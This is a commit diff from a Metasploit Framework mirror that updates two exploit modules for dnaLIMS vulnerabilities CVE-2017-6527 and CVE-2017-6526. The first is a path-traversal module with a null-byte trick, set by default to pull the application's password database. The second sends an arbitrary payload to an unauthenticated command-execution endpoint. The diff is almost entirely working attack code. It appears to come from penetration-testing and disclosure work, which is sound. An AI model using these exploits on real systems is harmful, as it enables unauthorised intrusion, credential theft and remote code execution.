infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3 from h00die/flakeydna 

dnalims
bug/bundler_fix
Flaky Biscuits 2017-03-20 10:59:52 -04:00 committed by GitHub
parent 0ab3ad86ee fd5345a869
commit a7671397ba
2 changed files with 15 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/linux/http/dnalims_file_retrieve.rb → modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
View File

@ -1,5 +1,3 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -7,8 +5,7 @@
require 'msf/core' require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -24,14 +21,14 @@ class MetasploitModule < Msf::Exploit::Remote
}, },
'References' => 'References' =>
[ [
['CVE', '2017-6527'] ['CVE', '2017-6527'],
['US-CERT-VU', '929263'] ['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
], ],
'Author' => 'Author' =>
[ [
'h00die', # Discovery, PoC 'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC 'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => "Mar 8 2017" 'DisclosureDate' => "Mar 8 2017"
@ -40,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']), OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']), OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
OptInt.new('DEPTH', [true, 'The max traversal depth', 11]) OptInt.new('DEPTH', [true, 'The traversal depth', 4])
], self.class) ], self.class)
deregister_options('RHOST') deregister_options('RHOST')
@ -57,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Requesting: #{file} - #{rhost}") print_status("Requesting: #{file} - #{rhost}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{base}/viewAppletFsa.cgi", 'uri' => "#{base}/viewAppletFsa.cgi",
'vars_get' => { 'secID' => "#{traverse}#{file}", 'vars_get' => { 'secID' => "#{traverse}#{file}%00",
'Action' => 'blast', 'Action' => 'blast',
'hidenav' => '1' 'hidenav' => '1'
} }
@ -68,14 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote
return return
end end
if res.code != 200 if res.code != 200
print_error("Server returned a non-200 response (body will not be saved):") print_error("Server returned a non-200 response (body will not be saved):")
print_line(res.to_s) print_line(res.to_s)
return return
end end
vprint_line(res.body) vprint_good(res.body)
p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
print_good("File saved as: #{p}") print_good("File saved as: #{p}")
end end

14
modules/exploits/linux/http/dnalims_admin_exec.rb
View File

@ -1,5 +1,3 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -18,18 +16,18 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{ 'Description' => %q{
This module utilizes an administrative module which allows for This module utilizes an administrative module which allows for
command execution. This page is completely unprotected from any command execution. This page is completely unprotected from any
authentication when given a POST command. authentication when given a POST request.
}, },
'Author' => 'Author' =>
[ [
'h00die <mike@stcyrsecurity.com>', # Discovery, PoC 'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC 'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['CVE', '2017-6526'] ['CVE', '2017-6526'],
['US-CERT-VU', '929263'] ['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
], ],
'Platform' => %w( linux unix ), 'Platform' => %w( linux unix ),
@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
'username' => '', 'username' => '',
'navUserName' => '', 'navUserName' => '',
'Action' => 'executeCmd', 'Action' => 'executeCmd',
'executeCmdData' => 'ls', 'executeCmdData' => payload.encoded,
} }
) )
vprint_good(res.body) vprint_good(res.body)